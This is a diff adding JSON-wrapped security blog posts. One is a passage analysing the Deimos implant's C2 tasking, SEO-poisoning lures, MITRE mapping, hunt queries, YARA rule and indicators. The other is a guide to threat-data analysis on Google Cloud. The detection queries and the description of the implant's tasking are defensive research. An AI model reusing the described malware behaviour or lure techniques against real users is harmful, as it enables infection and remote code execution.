ping sends information about the environment, including the machine name, Windows version, CPU architecture, whether the user has administrative privileges, and a version string for the implant.\n\nIf a task is scheduled for the implant, the response to the ping command will contain a status value that is set to either \"file\" or \"command\". If no task is given, the implant will sleep for 20 seconds plus a random wait between 0 and 20 seconds. This is the wait time between all tasks.\n\nFor \"file\" tasks, the implant immediately performs another request using the task_id attribute from the task definition to retrieve the file. The implant expects an \"exe\" file, a \"ps1\" file, or a \"module\", which is a .Net Assembly file.\n\nWhen an \"exe\" is downloaded, it will be written to a file at `%TEMP%\\<RANDOM_NAME>.exe`, where RANDOM_NAME is a 24-character alphanumeric value with all capital letters. A new process is immediately launched by executing the file, and the status is reported on the next task interval.\n\nWhen a \"ps1\" file is downloaded, the contents of the script are passed to a new PowerShell process using Standard Input.\n\nFinally, \"module\" files are added to a \"plugin manager\", which executes their \"Run\" method.\n\nFor \"command\" tasks, no additional request is required. The \"command\" value from the response contains PowerShell code that will be executed in the same way as the \"ps1\" file type.\n\nPresumably, the threat actor would use the \"command\" type for quick scripts or interactive operations. 
For larger scripts, the \"file\" type would be used.\n\n### Tools\n\nLooking at the metadata from all of the observed samples, we can see a high-confidence connection in that they were all created using a single PDF software platform.\n\n```\nComments : This installation was built with Inno Setup.\nCompany Name :\nFile Description : SlimReader Setup\nFile Version :\nLegal Copyright : (c) InvestTech\nOriginal File Name :\nProduct Name : SlimReader\nProduct Version : 1.4.1.2\n```\n\n_Figure 14: Malware lure file metadata_\n\nWhile this software appears to be legitimate, it is frequently used to create lure files. We have observed 53 malware, or malware-adjacent, samples created using the SlimReader tool. Additionally, the research team at eSentire [identified](https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire) SlimReader as the tool of choice in the creation of, reportedly, hundreds of thousands of lure files.\n\n### TTPs\n\nAt the very top of the pyramid, we observe a characteristic that is present in our samples as well as others reported by security researchers. In all observed cases, the malware used techniques known as [Google Sneaky Redirects](https://developers.google.com/search/docs/advanced/guidelines/sneaky-redirects) and [Search Engine Optimization (SEO) Poisoning](https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882) to trick users into installing the malware.\n\nSEO poisoning is a technique that stuffs SEO keywords into a document to inflate its ranking on search engines, so malicious documents and websites rank higher in web search results. Additionally, Google Sneaky Redirects is a technique that names the initial malware installer after the user's Google search query as a way to fool the user into clicking on the file they downloaded. 
As an example, if a user searches for \"free resume template\" and then clicks on a malicious website that appears to have that file, they will be presented with a malware installer named, in this example, free-resume-template.exe. The malware uses a PDF icon, even though it is an executable, in an attempt to trick the user into executing the PE file, which starts the PowerShell processes highlighted below in the Elastic Analyzer view.\n\n\n\nUnderstanding the malware processes, as well as how the malware maps to the different elements of the Pyramid of Pain, is paramount to inflicting long-term impact on the activity group and intrusion sets.\n\n## Impact\n\nThe described intrusion sets leverage multiple tactics and techniques categorized by the MITRE ATT&CK® framework. Other TTPs may exist; however, they were not observed during our analysis.\n\n### Tactics\n\n- [Resource Development](https://attack.mitre.org/tactics/TA0042)\n- [Initial Access](https://attack.mitre.org/tactics/TA0001)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- [Command and Control](https://attack.mitre.org/tactics/TA0011)\n\n### Techniques / Sub Techniques\n\n- [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) - [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)\n- [Develop Capabilities](https://attack.mitre.org/techniques/T1587) - [Malware](https://attack.mitre.org/techniques/T1587/001), [Code Signing Certificates](https://attack.mitre.org/techniques/T1587/002) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588) - [Malware](https://attack.mitre.org/techniques/T1588/001), [Code Signing Certificates](https://attack.mitre.org/techniques/T1588/003)\n- [Drive-by Compromise](https://attack.mitre.org/techniques/T1189/)\n- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) - 
[PowerShell](https://attack.mitre.org/techniques/T1059/001)\n- [User Execution](https://attack.mitre.org/techniques/T1204) - [Malicious File](https://attack.mitre.org/techniques/T1204/002)\n- [Boot or Logon Autostart Execution](https://attack.mitre.org/techniques/T1547) - [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)\n- [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) - [Indicator Removal from Tools](https://attack.mitre.org/techniques/T1027/005)\n- [Application Layer Protocol](https://attack.mitre.org/techniques/T1071) - [Web Protocols](https://attack.mitre.org/techniques/T1071/001)\n\n## Detection\n\nThere is an [existing detection rule](https://www.elastic.co/guide/en/security/8.0/shortcut-file-written-or-modified-for-persistence.html) that will generically identify this activity. We are also releasing two additional rules to detect these techniques. Additionally, we are providing hunting queries that can identify other intrusion sets leveraging similar techniques.\n\n### Detection Logic\n\nElastic maintains a public repository for detection logic using the Elastic Stack and Elastic Endgame.\n\n### New Detection Rules\n\n[Suspicious Registry Modifications](https://github.com/elastic/detection-rules/issues/1488)\n\n[Abnormal File Extension in User AppData Roaming Path](https://github.com/elastic/detection-rules/issues/1489)\n\n## Hunting Queries\n\nThese queries can be used in Kibana's Security → Timelines → New Timeline → Correlation query editor. 
While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.\n\nThis query will identify the initial dropped file containing the obfuscated installer.\n\n```\nfile where file.path regex \"\"\"C:\\\\Users\\\\[^\\\\]*\\\\([a-z0-9]{32}\\\\){6}[a-z0-9]{32}\"\"\"\n```\n\n_Figure 16: Hunt query identifying initial installer_\n\n\n\nThis query will identify the unique “Hardware ID” file (`hwid`) that is created the first time the implant is run. This ID file is used to uniquely identify this installation.\n\n```\nfile where file.path regex~ \"\"\".*\\\\APPDATA\\\\ROAMING\\\\[A-Za-z0-9_]{96,192}\"\"\"\n```\n\n_Figure 18: Hunt query identifying Hardware ID_\n\n\n\nThis query will identify any files with a file extension of ten or more characters in the AppData\\Roaming path.\n\n```\nfile where file.path : \"*\\\\appdata\\\\roaming\\\\*\" and\nlength(file.extension) >= 10 and\nprocess.name : (\"cmd.exe\", \"powershell.exe\", \"wmic.exe\", \"mshta.exe\", \"pwsh.exe\", \"cscript.exe\", \"wscript.exe\", \"regsvr32.exe\", \"RegAsm.exe\", \"rundll32.exe\", \"EQNEDT32.EXE\", \"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\", \"iexplore.exe\", \"InstallUtil.exe\")\n```\n\n_Figure 20: Hunt query identifying long file extensions_\n\n\n\nThis query will identify a long string value containing the word \"powershell\" in the Registry.\n\n```\nregistry where registry.data.strings : \"*powershell*\" and length(registry.data.strings) >= 100\n```\n\n_Figure 22: Hunt query identifying long Registry strings_\n\n\n\n## YARA Rules\n\nWe have created a YARA rule to identify the presence of the Deimos trojan DLL file described in this post.\n\n```\nrule Windows_Trojan_Deimos_DLL {\nmeta:\nauthor = \"Elastic Security\"\ncreation_date = \"2021-09-18\"\nlast_modified = \"2021-09-18\"\nos = \"Windows\"\narch = \"x86\"\ncategory_type = \"Trojan\"\nfamily = 
\"Deimos\"\nthreat_name = \"Windows.Trojan.Deimos\"\ndescription = \"Detects the presence of the Deimos trojan DLL file.\"\nreference = \"\"\nreference_sample = \"2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e\"\n\nstrings:\n$a1 = \"\\\\APPDATA\\\\ROAMING\" wide fullword\n$a2 = \"{\\\"action\\\":\\\"ping\\\",\\\"\" wide fullword\n$a3 = \"Deimos\" ascii fullword\n$b1 = { 00 57 00 58 00 59 00 5A 00 5F 00 00 17 75 00 73 00 65 00 72 00 }\n$b2 = { 0C 08 16 1F 68 9D 08 17 1F 77 9D 08 18 1F 69 9D 08 19 1F 64 9D }\ncondition:\nall of ($a*) or 1 of ($b*)\n}\n```\n\n_Figure 24: Deimos DLL YARA Rule_\n\nYou can access this YARA rule [here](https://github.com/elastic/examples/tree/master/blog/climbing-the-pyramid-with-celestial-themed-malware).\n\n## Defensive Recommendations\n\nThe following steps can be leveraged to improve a network's protective posture.\n\n1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat.\n2. Review and ensure that you have deployed the latest Microsoft Security Updates.\n3. 
Maintain backups of your critical systems to aid in quick recovery.\n\n## References\n\nThe following research was referenced throughout the document:\n\n- [https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)\n- [https://redcanary.com/blog/yellow-cockatoo](https://redcanary.com/blog/yellow-cockatoo)\n- [https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis](https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis)\n- [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/Deimos.A!rfn&ThreatID=2147770772](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/Deimos.A!rfn&ThreatID=2147770772)\n- [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html)\n- [https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)\n- [https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)\n- [https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)\n- [https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire](https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire)\n- 
[https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882](https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882)\n\n## Indicators\n\n| Indicators | Type | Note |\n| ---------------------------------------------------------------- | ----------- | ------------------- |\n| f268491d2f7e9ab562a239ec56c4b38d669a7bd88181efb0bd89e450c68dd421 | SHA256 hash | Lure file |\n| af1e952b5b02ca06497e2050bd1ce8d17b9793fdb791473bdae5d994056cb21f | SHA256 hash | Malware installer |\n| d6e1c6a30356009c62bc2aa24f49674a7f492e5a34403344bfdd248656e20a54 | SHA256 hash | .NET DLL file |\n| 216[.]230[.]232[.]134 | IP address | Command and control |\n"
+ },
+ "title": "Going Coast to Coast - Climbing the Pyramid with the Deimos Implant",
+ "slug": "going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant",
+ "date": "2022-06-08",
+ "description": "The Deimos implant was first reported in 2020 and has been in active development, employing advanced countermeasures to frustrate analysis. This post details the campaign TTPs through the malware indicators.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "derek-ditch"
+ }
+ ],
+ "image": "blog-security-radar-720x420.png",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ]
+ },
+ "id": "security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_cloud_for_cyber_data_analytics-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_cloud_for_cyber_data_analytics-md.json
new file mode 100644
index 00000000000..b2ac871978c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_cloud_for_cyber_data_analytics-md.json
@@ -0,0 +1,31 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Google Cloud for Cyber Data Analytics\"\nslug: \"google-cloud-for-cyber-data-analytics\"\ndate: \"2023-12-14\"\nsubtitle: \"Navigating the seas of cyber threat data with Google Cloud\"\ndescription: \"This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis.\"\nauthor:\n - slug: terrance-dejesus\n - slug: eric-forte\nimage: \"photo-edited-12.png\"\ncategory:\n - slug: security-research\ntags:\n - google cloud\n---\n\n# Introduction\n\nIn today's digital age, the sheer volume of data generated by devices and systems can be both a challenge and an opportunity for security practitioners. Analyzing a high magnitude of data to craft valuable or actionable insights on cyber attack trends requires precise tools and methodologies.\n\nBefore you delve into the task of data analysis, you might find yourself asking:\n\n - What specific questions am I aiming to answer, and do I possess the necessary data?\n - Where is all the pertinent data located?\n - How can I gain access to this data?\n - Upon accessing the data, what steps are involved in understanding and organizing it?\n - Which tools are most effective for extracting, interpreting, or visualizing the data?\n - Should I analyze the raw data immediately or wait until it has been processed?\n - Most crucially, what actionable insights can be derived from the data?\n\nIf these questions resonate with you, you're on the right path. Welcome to the world of Google Cloud, where we'll address these queries and guide you through the process of creating a comprehensive report.\n\nOur approach will include several steps in the following order:\n\n**Exploration:** We start by thoroughly understanding the data at our disposal. 
This phase involves identifying potential insights we aim to uncover and verifying the availability of the required data.\n\n**Extraction:** Here, we gather the necessary data, focusing on the most relevant and current information for our analysis.\n\n**Pre-processing and transformation:** At this stage, we prepare the data for analysis. This involves normalizing (cleaning, organizing, and structuring) the data to ensure its readiness for further processing.\n\n**Trend analysis:** The majority of our threat findings and observations derive from this effort. We analyze the processed data for patterns, trends, and anomalies. Techniques such as time series analysis and aggregation are employed to understand the evolution of threats over time and to highlight significant cyber attacks across various platforms.\n\n**Reduction:** In this step, we distill the data to its most relevant elements, focusing on the most significant and insightful aspects.\n\n**Presentation:** The final step is about presenting our findings. Utilizing tools from Google Workspace, we aim to display our insights in a clear, concise, and visually-engaging manner.\n\n**Conclusion:** Reflecting on this journey, we'll discuss the importance of having the right analytical tools. We'll highlight how Google Cloud Platform (GCP) provides an ideal environment for analyzing cyber threat data, allowing us to transform raw data into meaningful insights.\n\n# Exploration: Determining available data\n\nBefore diving into any sophisticated analyses, it's necessary to prepare by establishing an understanding of the data landscape we intend to study.\n\nHere's our approach:\n\n 1. **Identifying available data:** The first step is to ascertain what data is accessible. This could include malware phenomena, endpoint anomalies, cloud signals, etc. Confirming the availability of these data types is essential.\n 2. **Locating the data stores:** Determining the exact location of our data. 
Knowing where our data resides – whether in databases, data lakes, or other storage solutions – helps streamline the subsequent analysis process.\n 3. **Accessing the data:** It’s important to ensure that we have the necessary permissions or credentials to access the datasets we need. If we don’t, attempting to identify and request access from the resource owner is necessary.\n 4. **Understanding the data schema:** Comprehending the structure of our data is vital. Knowing the schema aids in planning the analysis process effectively.\n 5. **Evaluating data quality:** Just like any thorough analysis, assessing the quality of the data is crucial. We check whether the data is segmented and detailed enough for a meaningful trend analysis.\n\nThis phase is about ensuring that our analysis is based on solid and realistic foundations. For a report like the [Global Threat Report](http://www.elastic.co/gtr), we rely on rich and pertinent datasets such as:\n\n - **Cloud signal data:** This includes data from global Security Information and Event Management (SIEM) alerts, especially focusing on cloud platforms like AWS, GCP, and Azure. This data is often sourced from [public detection rules](https://github.com/elastic/detection-rules).\n - **Endpoint alert data:** Data collected from the global [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) alerts, incorporating a variety of public [endpoint behavior rules](https://github.com/elastic/protections-artifacts/tree/main/behavior).\n - **Malware data:** This involves data from global Elastic Defend alerts, enriched with [MalwareScore](https://www.elastic.co/blog/introducing-elastic-endpoint-security) and public [YARA rules](https://github.com/elastic/protections-artifacts/tree/main/yara).\n \n Each dataset is categorized and enriched for context with frameworks like [MITRE ATT&CK](https://attack.mitre.org/), Elastic Stack details, and customer insights. 
Storage solutions of Google Cloud Platform, such as BigQuery and Google Cloud Storage (GCS) buckets, provide a robust infrastructure for our analysis.\n\nIt's also important to set a data “freshness” threshold, excluding data older than 365 days for an annual report, to ensure relevance and accuracy.\n\nLastly, remember to choose data that offers an unbiased perspective. Excluding or including internal data should be an intentional, strategic decision based on its relevance to your visibility.\n\nIn summary, selecting the right tools and datasets is fundamental to creating a comprehensive and insightful analysis. Each choice contributes uniquely to the overall effectiveness of the data analysis, ensuring that the final insights are both valuable and impactful.\n\n# Extraction: The first step in data analysis\n\nHaving identified and located the necessary data, the next step in our analytical journey is to extract this data from our storage solutions. This phase is critical, as it sets the stage for the in-depth analysis that follows.\n\n## Data extraction tools and techniques\n\nVarious tools and programming languages can be utilized for data extraction, including Python, R, Go, Jupyter Notebooks, and Looker Studio. Each tool offers unique advantages, and the choice depends on the specific needs of your analysis.\n\nIn our data extraction efforts, we have found the most success with a combination of [BigQuery](https://cloud.google.com/bigquery?hl=en), [Colab Notebooks](https://colab.google/), [buckets](https://cloud.google.com/storage/docs/json_api/v1/buckets), and [Google Workspace](https://workspace.google.com/) to extract the required data. Colab Notebooks, akin to Jupyter Notebooks, operate within Google's cloud environment, providing a seamless integration with other Google Cloud services.\n\n## BigQuery for data staging and querying\n\nIn the analysis process, a key step is to \"stage\" our datasets using BigQuery. 
This involves utilizing BigQuery queries to create and save objects, thereby making them reusable and shareable across our team. We achieve this by employing the [CREATE TABLE](https://hevodata.com/learn/google-bigquery-create-table/#b2) statement, which allows us to combine multiple [datasets](https://cloud.google.com/bigquery/docs/datasets-intro) such as endpoint behavior alerts, customer data, and rule data into a single, comprehensive dataset.\n\nThis consolidated dataset is then stored in a BigQuery table specifically designated for this purpose–for this example, we’ll refer to it as the “Global Threat Report” dataset. This approach is applied consistently across different types of data, including both cloud signals and malware datasets.\n\nThe newly created data table, for instance, might be named `elastic.global_threat_report.ep_behavior_raw`. This naming convention, defined by BigQuery, helps in organizing and locating the datasets effectively, which is crucial for the subsequent stages of the extraction process.\n\nAn example of a BigQuery query used in this process might look like this:\n\n```\nCREATE TABLE elastic.global_threat_report.ep_behavior_raw AS\nSELECT * FROM ...\n```\n\n\nDiagram for BigQuery query to an exported dataset table\n\nWe also use the [EXPORT DATA](https://cloud.google.com/bigquery/docs/reference/standard-sql/other-statements#export_data_statement) statement in BigQuery to transfer tables to other GCP services, like exporting them to Google Cloud Storage (GCS) buckets in [parquet file format](https://parquet.apache.org/).\n\n```\nEXPORT DATA\n OPTIONS (\n uri = 'gs://**/ep_behavior/*.parquet',\n format = 'parquet',\n overwrite = true\n )\nAS (\nSELECT * FROM `project.global_threat_report.2023_pre_norm_ep_behavior`\n)\n```\n\n## Colab Notebooks for loading staged datasets\n\n[Colab Notebooks](https://colab.research.google.com/) are instrumental in organizing our data extraction process. 
They allow for easy access and management of data scripts stored in platforms like GitHub and Google Drive.\n\nFor authentication and authorization, we use Google Workspace credentials, simplifying access to various Google Cloud services, including BigQuery and Colab Notebooks. Here's a basic example of how authentication is handled:\n\n\nDiagram for authentication and authorization between Google Cloud services\n\nFor those new to [Jupyter Notebooks](https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/) or dataframes, it's beneficial to spend time becoming familiar with these tools. They are fundamental in any data analyst's toolkit, allowing for efficient code management, data analysis, and structuring. Mastery of these tools is key to effective data analysis.\n\nUpon creating a notebook in Google Colab, we're ready to extract our custom tables (such as project.global_threat_report.ep_behavior_raw) from BigQuery. This data is then loaded into Pandas Dataframes, a Python library that facilitates data manipulation and analysis. While handling large datasets with Python can be challenging, Google Colab provides robust virtual computing resources. If needed, these resources can be scaled up through the Google Cloud [Marketplace](https://console.cloud.google.com/marketplace/product/colab-marketplace-image-public/colab) or the Google Cloud Console, ensuring that even large datasets can be processed efficiently.\n\n## Essential Python libraries for data analysis\n\nIn our data analysis process, we utilize various Python libraries, each serving a specific purpose:\n\n| Library | Description |\n|-----------|---------------|\n|[datetime](https://docs.python.org/3/library/datetime.html) | Essential for handling all operations related to date and time in your data. It allows you to manipulate and format date and time information for analysis. 
|\n| [google.auth](https://google-auth.readthedocs.io/en/master/) | Manages authentication and access permissions, ensuring secure access to Google Cloud services. It's key for controlling who can access your data and services. |\n| [google.colab.auth](https://cloud.google.com/python/docs/reference/bigquery/latest) | Provides authentication for accessing Google Cloud services within Google Colab notebooks, enabling a secure connection to your cloud-based resources. |\n| [google.cloud.bigquery](https://cloud.google.com/python/docs/reference/bigquery/latest) | A tool for managing large datasets in Google Cloud's BigQuery service. It allows for efficient processing and analysis of massive amounts of data. |\n| [google.cloud.storage](https://cloud.google.com/python/docs/reference/storage/latest) | Used for storing and retrieving data in Google Cloud Storage. It's an ideal solution for handling various data files in the cloud. |\n| [gspread](https://docs.gspread.org/en/latest/) | Facilitates interaction with Google Spreadsheets, allowing for easy manipulation and analysis of spreadsheet data. |\n| [gspread.dataframe](https://pypi.org/project/gspread-dataframe/).set_with_dataframe | Syncs data between Pandas dataframes and Google Spreadsheets, enabling seamless data transfer and updating between these formats. |\n| [matplotlib](https://pypi.org/project/matplotlib/).pyplot.plt | A module in Matplotlib library for creating charts and graphs. It helps in visualizing data in a graphical format, making it easier to understand patterns and trends. |\n| [pandas](https://pandas.pydata.org/) | A fundamental tool for data manipulation and analysis in Python. It offers data structures and operations for manipulating numerical tables and time series. |\n| [pandas.gbq](https://pypi.org/project/pandas-gbq/).to_gbq | Enables the transfer of data from Pandas dataframes directly into Google BigQuery, streamlining the process of moving data into this cloud-based analytics platform. 
|\n| [pyarrow](https://arrow.apache.org/docs/python/index.html).parquet.pq | Allows for efficient storage and retrieval of data in the Parquet format, a columnar storage file format optimized for use with large datasets. |\n| [seaborn](https://seaborn.pydata.org/) | A Python visualization library based on Matplotlib that provides a high-level interface for drawing attractive and informative statistical graphics. |\n\nNext, we authenticate with BigQuery, and receive authorization to access our datasets as demonstrated earlier. By using Google Workspace credentials, we can easily access BigQuery and other Google Cloud services. The process typically involves a simple code snippet for authentication:\n\n```\nfrom google.colab import auth\nfrom google.cloud import bigquery\n\nauth.authenticate_user()\nproject_id = \"PROJECT_FROM_GCP\"\nclient = bigquery.Client(project=project_id)\n```\n\nWith authentication complete, we can then proceed to access and manipulate our data. Google Colab's integration with Google Cloud services simplifies this process, making it efficient and secure.\n\n## Organizing Colab Notebooks before analysis\n\nWhen working with Jupyter Notebooks, it's better to organize your notebook beforehand. Various stages of handling and manipulating data will be required, and staying organized will help you create a repeatable, comprehensive process. \n\nIn our notebooks, we use Jupyter Notebook headers to organize the code systematically. This structure allows for clear compartmentalization and the creation of collapsible sections, which is especially beneficial when dealing with complex data operations that require multiple steps. This methodical organization aids in navigating the notebook efficiently, ensuring that each step in the data extraction and analysis process is easily accessible and manageable.\n\nMoreover, while the workflow in a notebook might seem linear, it's often more dynamic. 
Data analysts frequently engage in multitasking, jumping between different sections as needed based on the data or results they encounter. Furthermore, new insights discovered in one step may influence another step’s process, leading to some back and forth before finishing the notebook.\n\n## Extracting our BigQuery datasets into dataframes\n\nAfter establishing the structure of our notebook and successfully authenticating with BigQuery, our next step is to retrieve the required datasets. This process sets the foundation for the rest of the report, as the information from these sources will form the basis of our analysis, similar to selecting the key components required for a comprehensive study.\n\nHere's an example of how we might fetch data from BigQuery:\n\n```\nimport datetime\n\ncurrent_year = datetime.datetime.now().year\nreb_table_id = f'project.global_threat_report.{current_year}_raw_ep_behavior'\nreb_table = client.list_rows(reb_table_id)\nreb_df = reb_table.to_dataframe()\n```\n\nThis snippet demonstrates a typical data retrieval process. We first define the table we're interested in (for the Global Threat Report, `project.global_threat_report.ep_behavior_raw` for the current year). Then, we use the BigQuery client to list the table's rows and load them into a Pandas DataFrame. This DataFrame will serve as the foundation for our subsequent data analysis steps.\n\n\nColab Notebook snippet for data extraction from BigQuery into Pandas dataframe\n\nThis process marks the completion of the extraction phase. We have successfully navigated BigQuery to select and retrieve the necessary datasets and load them into dataframes within our notebooks. The extraction phase is pivotal, as it not only involves gathering the data but also setting up the foundation for deeper analysis. 
It's the initial step in a larger journey of discovery, leading to the transformation phase, where we will uncover more detailed insights from the data.\n\nIn summary, this part of our data journey is about more than just collecting datasets; it's about structurally preparing them for the in-depth analysis that follows. This meticulous approach to organizing and executing the extraction phase sets the stage for the transformative insights that we aim to derive in the subsequent stages of our data analysis.\n\n# Pre-processing and transformation: The critical phase of data analysis\n\nThe transition from raw data to actionable insights involves a series of crucial steps in data processing. After extracting data, our focus shifts to refining it for analysis. Cybersecurity datasets often include various forms of noise, such as false positives and anomalies, which must be addressed to ensure accurate and relevant analysis.\n\nKey stages in data pre-processing and transformation:\n\n - **Data cleaning:** This stage involves filling NULL values, correcting data misalignments, and validating data types to ensure the dataset's integrity.\n - **Data enrichment:** In this step, additional context is added to the dataset. For example, incorporating third-party data, like malware reputations from sources such as VirusTotal, enhances the depth of analysis.\n - **Normalization:** This process standardizes the data to ensure consistency, which is particularly important for varied datasets like endpoint malware alerts.\n - **Anomaly detection:** Identifying and rectifying outliers or false positives is critical to maintain the accuracy of the dataset.\n - **Feature extraction:** The process of identifying meaningful, consistent data points that can be further extracted for analysis.\n\n## Embracing the art of data cleaning\n\nData cleaning is a fundamental step in preparing datasets for comprehensive analysis, especially in cybersecurity. 
This process involves a series of technical checks to ensure data integrity and reliability. Here are the specific steps:\n\n - **Mapping to MITRE ATT&CK framework:** Verify that all detection and response rules in the dataset are accurately mapped to the corresponding tactics and techniques in the MITRE ATT&CK framework. This check includes looking for NULL values or any inconsistencies in how the data aligns with the framework.\n\n - **Data type validation:** Confirm that the data types within the dataset are appropriate and consistent. For example, timestamps should be in a standardized datetime format. This step may involve converting string formats to datetime objects or verifying that numerical values are in the correct format.\n\n - **Completeness of critical data:** Ensure that no vital information is missing from the dataset. This includes checking for the presence of essential elements like SHA256 hashes or executable names in endpoint behavior logs. The absence of such data can lead to incomplete or biased analysis.\n\n - **Standardization across data formats:** Assess and implement standardization of data formats across the dataset to ensure uniformity. This might involve normalizing text formats, ensuring consistent capitalization, or standardizing date and time representations.\n\n - **Duplicate entry identification:** Identify and remove duplicate entries by examining unique identifiers such as XDR agent IDs or cluster IDs. This process might involve using functions to detect and remove duplicates, ensuring the uniqueness of each data entry.\n\n - **Exclusion of irrelevant internal data:** Locate and remove any internal data that might have inadvertently been included in the dataset. This step is crucial to prevent internal biases or irrelevant information from affecting the analysis.\n\n It is important to note that data cleaning or “scrubbing the data” is a continuous effort throughout our workflow. 
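The cleaning checks above can be sketched with a few lines of Pandas. This is a minimal illustration only; the column names (`timestamp`, `sha256`, `agent_id`, `mitre_tactic`) are hypothetical stand-ins, and in practice the dataframe would come from the BigQuery extraction step:

```
import pandas as pd

# Hypothetical raw alert data standing in for an extracted BigQuery table
df = pd.DataFrame({
    'timestamp': ['2023-01-01 10:00:00', '2023-01-01 10:00:00', None],
    'sha256': ['abc123', 'abc123', 'def456'],
    'agent_id': ['agent-1', 'agent-1', 'agent-2'],
    'mitre_tactic': ['Execution', 'Execution', None],
})

# Completeness of critical data: drop rows missing the MITRE ATT&CK mapping
df = df[df['mitre_tactic'].notnull()]

# Data type validation: standardize timestamps into datetime objects
df['timestamp'] = pd.to_datetime(df['timestamp'])

# Duplicate entry identification: keep one row per unique identifier set
df = df.drop_duplicates(subset=['agent_id', 'sha256', 'timestamp'])
```

Each line mirrors one of the checks listed above; the exact columns and rules will depend on the dataset being scrubbed.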
As we continue to peel back the layers of our data and wrangle it for various insights, it is expected that we identify additional changes.\n\n## Utilizing Pandas for data cleaning\n\nThe [Pandas](https://pandas.pydata.org/about/) library in Python offers several functionalities that are particularly useful for data cleaning in cybersecurity contexts. Some of these methods include:\n\n - `DataFrame.isnull()` or `DataFrame.notnull()` to identify missing values.\n - `DataFrame.drop_duplicates()` to remove duplicate rows.\n - Data type conversion methods like `pd.to_datetime()` for standardizing timestamp formats.\n - Utilizing boolean indexing to filter out irrelevant data based on specific criteria.\n\nA thorough understanding of the dataset is essential to determine the right cleaning methods. It may be necessary to explore the dataset preliminarily to identify specific areas requiring cleaning or transformation. Additional helpful methods and workflows can be found listed in [this](https://realpython.com/python-data-cleaning-numpy-pandas/) Real Python blog.\n\n## Feature extraction and enrichment\n\nFeature extraction and enrichment are core steps in data analysis, particularly in the context of cybersecurity. These processes involve transforming and augmenting the dataset to enhance its usefulness for analysis. \n\n - **Create new data from existing:** This is where we modify or use existing data to add additional columns or rows.\n - **Add new data from 3rd-party:** Here, we use existing data as a query reference for 3rd-party RESTful APIs which respond with additional data we can add to the datasets.\n\n## Feature extraction\n\nLet’s dig into a tangible example. Imagine we're presented with a bounty of publicly available YARA signatures that Elastic [shares](https://github.com/elastic/protections-artifacts/tree/main/yara/rules) with its community. These signatures trigger some of the endpoint malware alerts in our dataset. 
The rule names that appear in the raw data follow a consistent naming convention: `OperatingSystem_MalwareCategory_MalwareFamily`. These names can be deconstructed to provide more specific insights. Leveraging Pandas, we can expertly slice and dice the data. For those who prefer doing this during the dataset staging phase with BigQuery, the combination of [SPLIT](https://cloud.google.com/bigquery/docs/reference/standard-sql/string_functions#split) and [OFFSET](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators#offset_and_ordinal) clauses can yield similar results:\n\n```\ndf[['OperatingSystem', 'MalwareCategory', 'MalwareFamily']] = df['yara_rule_name'].str.split('_', expand=True)\n```\n\n\nFeature extraction with our YARA data\n\nThere are additional approaches, methods, and processes to feature extraction in data analysis. We recommend consulting your stakeholders' needs and exploring your data to help determine what is necessary for extraction and how.\n\n## Data enrichment\n\nData enrichment enhances the depth and context of cybersecurity datasets. One effective approach involves integrating external data sources to provide additional perspectives on the existing data. This can be particularly 